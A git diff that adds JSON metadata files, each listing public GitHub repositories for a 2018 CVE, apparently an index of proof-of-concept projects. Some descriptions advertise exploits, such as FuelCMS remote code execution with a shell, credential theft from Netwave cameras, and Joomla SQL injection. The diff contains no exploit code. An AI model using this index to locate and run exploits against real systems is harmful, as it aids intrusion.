"has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452770723, + "name": "cve-2018-16763-rust", + "full_name": "BrunoPincho\/cve-2018-16763-rust", + "owner": { + "login": "BrunoPincho", + "id": 18145434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18145434?v=4", + "html_url": "https:\/\/github.com\/BrunoPincho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BrunoPincho\/cve-2018-16763-rust", + "description": null, + "fork": false, + "created_at": "2022-01-27T17:04:04Z", + "updated_at": "2022-01-27T17:06:42Z", + "pushed_at": "2022-01-27T17:08:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 498394246, + "name": "CVE-2018-16763-FuelCMS-1.4.1-RCE", + "full_name": "p0dalirius\/CVE-2018-16763-FuelCMS-1.4.1-RCE", + "owner": { + "login": "p0dalirius", + "id": 79218792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79218792?v=4", + "html_url": "https:\/\/github.com\/p0dalirius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0dalirius\/CVE-2018-16763-FuelCMS-1.4.1-RCE", + "description": "Exploit to trigger RCE for CVE-2018-16763 on FuelCMS <= 1.4.1 and interactive shell. ", + "fork": false, + "created_at": "2022-05-31T15:31:37Z", + "updated_at": "2024-10-19T22:52:51Z", + "pushed_at": "2022-06-01T20:45:02Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cms", + "cve-2018-16763", + "exploit", + "fuelcms" + ], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 584911134, + "name": "CVE-2018-16763", + "full_name": "not1cyyy\/CVE-2018-16763", + "owner": { + "login": "not1cyyy", + "id": 101048320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101048320?v=4", + "html_url": "https:\/\/github.com\/not1cyyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/not1cyyy\/CVE-2018-16763", + "description": "CVE-2018-16763 FuelCMS 1.4 Remote Code Execution, this version of FuelCMS is still vulnerable until now", + "fork": false, + "created_at": "2023-01-03T20:47:08Z", + "updated_at": "2023-10-30T20:24:53Z", + "pushed_at": "2023-04-10T00:04:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 651534472, + "name": "CVE-2018-16763", + "full_name": "antisecc\/CVE-2018-16763", + "owner": { + "login": "antisecc", + "id": 92209707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92209707?v=4", + "html_url": "https:\/\/github.com\/antisecc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/antisecc\/CVE-2018-16763", + "description": null, + "fork": false, + "created_at": "2023-06-09T13:01:48Z", + "updated_at": "2023-06-09T13:01:49Z", + "pushed_at": "2023-06-09T13:01:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 667158382, + "name": "CVE-2018-16763", + "full_name": "VitoBonetti\/CVE-2018-16763", + "owner": { + "login": "VitoBonetti", + "id": 99612766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99612766?v=4", + "html_url": "https:\/\/github.com\/VitoBonetti", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VitoBonetti\/CVE-2018-16763", + "description": "Fuel CMS 1.4.1 - Remote Code Execution - Python 3.x", + "fork": false, + "created_at": "2023-07-16T20:40:45Z", + "updated_at": "2023-07-16T20:47:59Z", + "pushed_at": "2023-07-16T20:48:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-16809.json b/2018/CVE-2018-16809.json new file mode 100644 index 0000000000..456874f145 --- /dev/null +++ b/2018/CVE-2018-16809.json @@ -0,0 +1,33 @@ +[ + { + "id": 450485739, + "name": "CVE-2018-16809", + "full_name": "elkassimyhajar\/CVE-2018-16809", + "owner": { + "login": "elkassimyhajar", + "id": 82472369, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82472369?v=4", + "html_url": "https:\/\/github.com\/elkassimyhajar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/elkassimyhajar\/CVE-2018-16809", + "description": null, + "fork": false, + "created_at": "2022-01-21T12:37:40Z", + "updated_at": "2022-01-21T12:37:40Z", + "pushed_at": "2022-01-21T12:37:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-16843.json b/2018/CVE-2018-16843.json new file mode 100644 index 0000000000..54cd5162a3 --- /dev/null +++ b/2018/CVE-2018-16843.json @@ -0,0 +1,33 @@ +[ + { + "id": 323590787, + "name": "ingress-nginx-0.21-1.19.5", + "full_name": "flyniu666\/ingress-nginx-0.21-1.19.5", + "owner": { + "login": "flyniu666", + "id": 52430647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52430647?v=4", + "html_url": "https:\/\/github.com\/flyniu666", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/flyniu666\/ingress-nginx-0.21-1.19.5", + "description": "based on nginx 1.19.5 to fix for CVE-2018-16843, CVE-2018-16844, CVE-2019-9511, CVE-2019-9513, and CVE-2019-9516", + "fork": false, + "created_at": "2020-12-22T10:16:11Z", + "updated_at": "2020-12-23T11:45:29Z", + "pushed_at": "2020-12-23T11:45:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-16854.json b/2018/CVE-2018-16854.json new file mode 100644 index 0000000000..289931b498 --- /dev/null +++ b/2018/CVE-2018-16854.json @@ -0,0 +1,33 @@ +[ + { + "id": 179544105, + "name": "moodle-login-csrf", + "full_name": "danielthatcher\/moodle-login-csrf", + "owner": { + "login": "danielthatcher", + "id": 11726509, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11726509?v=4", + "html_url": "https:\/\/github.com\/danielthatcher", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/danielthatcher\/moodle-login-csrf", + "description": "Scripts for exploiting MSA-18-0020 (CVE-2018-16854) and MSA-19-0004 (CVE-2019-3847)", + "fork": false, + "created_at": "2019-04-04T17:24:47Z", + "updated_at": "2024-06-30T06:34:41Z", + "pushed_at": "2019-07-21T15:52:46Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-16858.json b/2018/CVE-2018-16858.json new file mode 100644 index 0000000000..ae81e3f086 --- /dev/null +++ b/2018/CVE-2018-16858.json @@ -0,0 +1,126 @@ +[ + { + "id": 181296970, + "name": "libreofficeExploit1", + "full_name": "4nimanegra\/libreofficeExploit1", + "owner": { + "login": "4nimanegra", + "id": 18334322, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18334322?v=4", + "html_url": "https:\/\/github.com\/4nimanegra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4nimanegra\/libreofficeExploit1", + "description": "CVE-2018-16858 exploit implementation", + "fork": false, + "created_at": "2019-04-14T11:10:18Z", + "updated_at": "2023-12-11T15:32:36Z", + "pushed_at": "2019-04-14T19:20:22Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 220178785, + "name": "detect-cve-2018-16858", + "full_name": "phongld97\/detect-cve-2018-16858", + "owner": { + "login": "phongld97", + "id": 42719247, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42719247?v=4", + "html_url": "https:\/\/github.com\/phongld97", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phongld97\/detect-cve-2018-16858", + "description": null, + "fork": false, + "created_at": "2019-11-07T07:40:49Z", + "updated_at": "2020-11-23T04:26:43Z", + "pushed_at": "2020-03-03T03:23:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 563855794, + "name": "CVE-2018-16858", + "full_name": "bantu2301\/CVE-2018-16858", + "owner": { + "login": "bantu2301", + "id": 116794059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116794059?v=4", + "html_url": "https:\/\/github.com\/bantu2301", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bantu2301\/CVE-2018-16858", + "description": null, + "fork": false, + "created_at": "2022-11-09T13:36:40Z", + "updated_at": "2022-11-10T03:04:51Z", + "pushed_at": "2022-11-24T08:45:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 683429922, + "name": "CVE-2018-16858-Python", + "full_name": "Henryisnotavailable\/CVE-2018-16858-Python", + "owner": { + "login": "Henryisnotavailable", + "id": 112469853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112469853?v=4", + "html_url": "https:\/\/github.com\/Henryisnotavailable", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Henryisnotavailable\/CVE-2018-16858-Python", + "description": "Python implementation of CVE-2018-16858 ", + "fork": false, + "created_at": "2023-08-26T14:50:55Z", + "updated_at": "2023-08-26T15:16:45Z", + "pushed_at": "2023-08-27T09:34:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-16875.json b/2018/CVE-2018-16875.json new file mode 100644 index 0000000000..ad121597e2 --- /dev/null +++ b/2018/CVE-2018-16875.json @@ -0,0 +1,33 @@ +[ + { + "id": 161712530, + "name": "poc-cve-2018-16875", + "full_name": "alexzorin\/poc-cve-2018-16875", + "owner": { + "login": "alexzorin", + "id": 311534, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/311534?v=4", + "html_url": "https:\/\/github.com\/alexzorin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alexzorin\/poc-cve-2018-16875", + "description": null, + "fork": false, + "created_at": "2018-12-14T00:53:46Z", + "updated_at": "2024-08-12T19:44:01Z", + "pushed_at": "2018-12-14T00:54:01Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-16890.json b/2018/CVE-2018-16890.json new file mode 100644 index 0000000000..99449f1098 --- /dev/null +++ b/2018/CVE-2018-16890.json @@ -0,0 +1,33 @@ +[ + { + "id": 253916583, + "name": "CVE-2018-16890", + "full_name": "michelleamesquita\/CVE-2018-16890", + "owner": { + "login": "michelleamesquita", + "id": 44561732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44561732?v=4", + "html_url": "https:\/\/github.com\/michelleamesquita", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michelleamesquita\/CVE-2018-16890", + "description": "CVE-2018-16890", + "fork": false, + "created_at": "2020-04-07T21:30:58Z", + "updated_at": "2020-04-07T21:31:01Z", + "pushed_at": "2022-09-06T01:24:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-16987.json b/2018/CVE-2018-16987.json new file mode 100644 index 0000000000..39a92b7a3c --- /dev/null +++ b/2018/CVE-2018-16987.json @@ -0,0 +1,33 @@ +[ + { + "id": 148659258, + "name": "CVE-2018-16987", + "full_name": "gquere\/CVE-2018-16987", + "owner": { + "login": "gquere", + "id": 1585000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1585000?v=4", + "html_url": "https:\/\/github.com\/gquere", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gquere\/CVE-2018-16987", + "description": "Details about CVE-2018-16987 - Cleartext storage of TA servers' passwords in Squash TM", + "fork": false, + "created_at": "2018-09-13T15:32:48Z", + "updated_at": "2018-09-14T06:17:55Z", + "pushed_at": "2018-09-13T16:47:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-17081.json b/2018/CVE-2018-17081.json new file mode 100644 index 0000000000..810e41b1f6 --- /dev/null +++ b/2018/CVE-2018-17081.json @@ -0,0 +1,33 @@ +[ + { + "id": 149863677, + "name": "e107_2.1.9_CSRF_POC", + "full_name": "himanshurahi\/e107_2.1.9_CSRF_POC", + "owner": { + "login": "himanshurahi", + "id": 29509010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29509010?v=4", + "html_url": "https:\/\/github.com\/himanshurahi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/himanshurahi\/e107_2.1.9_CSRF_POC", + "description": "CVE-2018-17081", + "fork": false, + "created_at": "2018-09-22T09:39:26Z", + "updated_at": "2020-09-21T10:24:57Z", + "pushed_at": "2020-09-21T10:24:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-17144.json b/2018/CVE-2018-17144.json new file mode 100644 index 0000000000..813368c93e --- /dev/null +++ b/2018/CVE-2018-17144.json @@ -0,0 +1,64 @@ +[ + { + "id": 152480350, + "name": "ban-exploitable-bitcoin-nodes", + "full_name": "iioch\/ban-exploitable-bitcoin-nodes", + "owner": { + "login": "iioch", + "id": 18705326, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18705326?v=4", + "html_url": "https:\/\/github.com\/iioch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iioch\/ban-exploitable-bitcoin-nodes", + "description": "Ban all denial-of-service vulnerability exploitable nodes from your node CVE-2018-17144 ", + "fork": false, + "created_at": "2018-10-10T19:44:09Z", + "updated_at": "2018-10-16T13:56:34Z", + "pushed_at": "2018-10-10T20:08:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 155528435, + "name": "CVE-2018-17144_POC", + "full_name": "hikame\/CVE-2018-17144_POC", + "owner": { + "login": "hikame", + "id": 6397196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6397196?v=4", + "html_url": "https:\/\/github.com\/hikame", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hikame\/CVE-2018-17144_POC", + "description": "Put the *.py files to test\/functional folder of bitcoin sourcecode (commit: 4901c00792c1dabae4bb01e6373c9b1ed9ef3008)", + "fork": false, + "created_at": "2018-10-31T09:07:35Z", + "updated_at": "2024-08-12T19:42:53Z", + "pushed_at": "2018-11-12T10:11:00Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-17182.json b/2018/CVE-2018-17182.json new file mode 100644 index 0000000000..a0549b2a4d --- /dev/null +++ b/2018/CVE-2018-17182.json @@ -0,0 +1,126 @@ +[ + { + "id": 150880187, + "name": "CVE-2018-17182", + "full_name": "jas502n\/CVE-2018-17182", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2018-17182", + "description": "Linux 内核VMA-UAF 提权漏洞(CVE-2018-17182),0day", + "fork": false, + "created_at": "2018-09-29T15:58:55Z", + "updated_at": "2024-08-12T19:42:04Z", + "pushed_at": "2018-10-02T09:03:37Z", + "stargazers_count": 129, + "watchers_count": 129, + "has_discussions": false, + "forks_count": 53, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 53, + "watchers": 129, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 151031561, + "name": "CVE-2018-17182", + "full_name": "likekabin\/CVE-2018-17182", + "owner": { + "login": "likekabin", + "id": 2469038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2469038?v=4", + "html_url": "https:\/\/github.com\/likekabin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likekabin\/CVE-2018-17182", + "description": null, + "fork": false, + "created_at": "2018-10-01T03:20:05Z", + "updated_at": "2018-10-01T03:20:17Z", + "pushed_at": "2018-10-01T03:20:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 151032211, + "name": "vmacache_CVE-2018-17182", + "full_name": "likekabin\/vmacache_CVE-2018-17182", + "owner": { + "login": "likekabin", + "id": 2469038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2469038?v=4", + "html_url": "https:\/\/github.com\/likekabin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likekabin\/vmacache_CVE-2018-17182", + "description": null, + "fork": false, + "created_at": "2018-10-01T03:29:04Z", + "updated_at": "2018-10-01T16:07:20Z", + "pushed_at": "2018-10-01T03:34:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 624820197, + "name": "cve-2018-17182", + "full_name": "jedai47\/cve-2018-17182", + "owner": { + "login": "jedai47", + "id": 47899257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47899257?v=4", + "html_url": "https:\/\/github.com\/jedai47", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jedai47\/cve-2018-17182", + "description": null, + "fork": false, + "created_at": "2023-04-07T10:35:24Z", + "updated_at": "2023-04-07T10:35:24Z", + "pushed_at": "2023-04-07T10:35:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-17207.json b/2018/CVE-2018-17207.json new file mode 100644 index 0000000000..7acb15bb4f --- /dev/null +++ b/2018/CVE-2018-17207.json @@ -0,0 +1,33 @@ +[ + { + "id": 168757000, + "name": "cve-2018-17207", + "full_name": "cved-sources\/cve-2018-17207", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2018-17207", + "description": "cve-2018-17207", + "fork": false, + "created_at": "2019-02-01T20:36:08Z", + "updated_at": "2021-04-15T22:51:20Z", + "pushed_at": "2021-04-15T22:51:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-17240.json b/2018/CVE-2018-17240.json new file mode 100644 index 0000000000..23521b48f8 --- /dev/null +++ b/2018/CVE-2018-17240.json @@ -0,0 +1,70 @@ +[ + { + "id": 501900189, + "name": "CVE-2018-17240", + "full_name": "BBge\/CVE-2018-17240", + "owner": { + "login": "BBge", + "id": 18453645, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18453645?v=4", + "html_url": "https:\/\/github.com\/BBge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BBge\/CVE-2018-17240", + "description": "CVE-2018-17240", + "fork": false, + "created_at": "2022-06-10T04:34:17Z", + "updated_at": "2022-06-10T04:39:47Z", + "pushed_at": "2022-06-10T04:39:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 739141829, + "name": "Netgrave", + "full_name": "Xewdy444\/Netgrave", + "owner": { + "login": "Xewdy444", + "id": 95155966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95155966?v=4", + "html_url": "https:\/\/github.com\/Xewdy444", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Xewdy444\/Netgrave", + "description": "A tool for retrieving login credentials from Netwave IP cameras using a memory dump vulnerability (CVE-2018-17240)", + "fork": false, + "created_at": "2024-01-04T21:44:21Z", + "updated_at": "2024-11-28T17:42:57Z", + "pushed_at": "2024-11-28T17:42:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "camera", + "exploit", + "netwave", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-17246.json b/2018/CVE-2018-17246.json new file mode 100644 index 0000000000..008d17f19a --- /dev/null +++ b/2018/CVE-2018-17246.json @@ -0,0 +1,33 @@ +[ + { + "id": 174601847, + "name": "CVE-2018-17246", + "full_name": "mpgn\/CVE-2018-17246", + "owner": { + "login": "mpgn", + "id": 5891788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mpgn\/CVE-2018-17246", + "description": "CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13", + "fork": false, + "created_at": "2019-03-08T20:06:15Z", + "updated_at": "2024-08-12T19:46:30Z", + "pushed_at": "2019-10-26T13:28:34Z", + "stargazers_count": 58, + "watchers_count": 58, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 58, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-17254.json b/2018/CVE-2018-17254.json new file mode 100644 index 0000000000..d107c72443 --- /dev/null +++ b/2018/CVE-2018-17254.json @@ -0,0 +1,70 @@ +[ + { + "id": 344934273, + "name": "Joomla-JCK-Editor-6.4.4-SQL-Injection", + "full_name": "Nickguitar\/Joomla-JCK-Editor-6.4.4-SQL-Injection", + "owner": { + "login": "Nickguitar", + "id": 3837916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3837916?v=4", + "html_url": "https:\/\/github.com\/Nickguitar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nickguitar\/Joomla-JCK-Editor-6.4.4-SQL-Injection", + "description": "Exploit for Joomla JCK Editor 6.4.4 (CVE-2018-17254)", + "fork": false, + "created_at": "2021-03-05T21:06:45Z", + "updated_at": "2024-02-02T19:38:11Z", + "pushed_at": "2021-04-17T20:55:23Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "joomla", + "joomla-jck-editor", + "php", + "rce", + "sql-injection" + ], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 594795788, + "name": "CVE-2018-17254", + "full_name": "MataKucing-OFC\/CVE-2018-17254", + "owner": { + "login": "MataKucing-OFC", + "id": 72303820, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72303820?v=4", + "html_url": "https:\/\/github.com\/MataKucing-OFC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MataKucing-OFC\/CVE-2018-17254", + "description": "Joomla JCK Editor 6.4.4 - 'parent' SQL Injection", + "fork": false, + "created_at": "2023-01-29T17:07:10Z", + "updated_at": "2023-09-13T12:09:56Z", + "pushed_at": "2023-01-29T17:37:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-17418.json b/2018/CVE-2018-17418.json new file mode 100644 index 0000000000..8a34a00821 --- /dev/null +++ b/2018/CVE-2018-17418.json @@ -0,0 +1,33 @@ +[ + { + "id": 149421281, + "name": "monstra_cms-3.0.4--getshell", + "full_name": "Jx0n0\/monstra_cms-3.0.4--getshell", + "owner": { + "login": "Jx0n0", + "id": 21152658, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21152658?v=4", + "html_url": "https:\/\/github.com\/Jx0n0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jx0n0\/monstra_cms-3.0.4--getshell", + "description": "monstra_cms-3.0.4-上传getshell CVE-2018-17418", + "fork": false, + "created_at": "2018-09-19T08:54:45Z", + "updated_at": "2021-12-03T10:21:53Z", + "pushed_at": "2018-09-24T15:58:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-17431.json b/2018/CVE-2018-17431.json new file mode 100644 index 0000000000..ab250eb12e --- /dev/null +++ b/2018/CVE-2018-17431.json @@ -0,0 +1,73 @@ +[ + { + "id": 160916642, + "name": "CVE-2018-17431-PoC", + "full_name": "Fadavvi\/CVE-2018-17431-PoC", + "owner": { + "login": "Fadavvi", + "id": 21213484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21213484?v=4", + "html_url": "https:\/\/github.com\/Fadavvi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fadavvi\/CVE-2018-17431-PoC", + "description": "Proof of consept for CVE-2018-17431", + "fork": false, + "created_at": "2018-12-08T07:47:41Z", + "updated_at": "2024-06-13T09:01:56Z", + "pushed_at": "2021-06-10T12:36:31Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "comodo", + "cve", + "cve-2018-17431", + "exploit", + "poc", + 